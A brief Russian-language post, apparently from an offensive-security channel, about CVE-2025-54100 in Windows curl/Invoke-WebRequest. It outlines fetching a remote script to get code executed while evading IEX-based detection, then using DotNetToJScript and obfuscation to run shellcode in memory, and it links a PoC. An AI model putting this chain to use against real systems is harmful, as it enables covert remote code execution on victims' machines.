3.0Kпросмотров
11 декабря 2025 г.
question📷 ФотоScore: 3.3K
помните, коллеги, как мы прятали три заветные буквы IEX в именах файлов, DNS-записях и прочем мусоре, скремблировали их словно Котельников речь в Соболе? так вот, в свежих сборках винды нам сами завезли подарок: curl / Invoke-WebRequest без -UseBasicParsing поднимает старый IE-движок и хавает <script> прямо из ответа.
CVE-2025-54100: можно больше не палиться с | iex, достаточно один раз дернуть «невинный»
curl http://…/a.js — а дальше уже вопрос фантазии и цепочки. у неискушённых может возникнуть вопрос:
"так это же просто javascript, что с ним сделать можно помимо alert(1)?" ха-ха. из самого очевидного — берёте DotNetToJScript, генерите .js, который грузит .NET-сборку и бахает шеллкод в памяти скомпрометированной станции. обфусцируете js, чуть поигрались с методом исполнения самого шеллкода
??????
PROFIT мысль: SSRF в некоторых веб-приложениях под Windows теперь прям просится быть докрученным до RCE. если бэкенд где-то в кишках дергает curl/iwr по вашему URL — этот вектор имеет смысл проверять отдельно и аккуратно. ссылки:
PoC CVE-2025-54100 — https://github.com/osman1337-security/CVE-2025-54100
DotNetToJScript — https://github.com/tyranid/DotNetToJScript 👾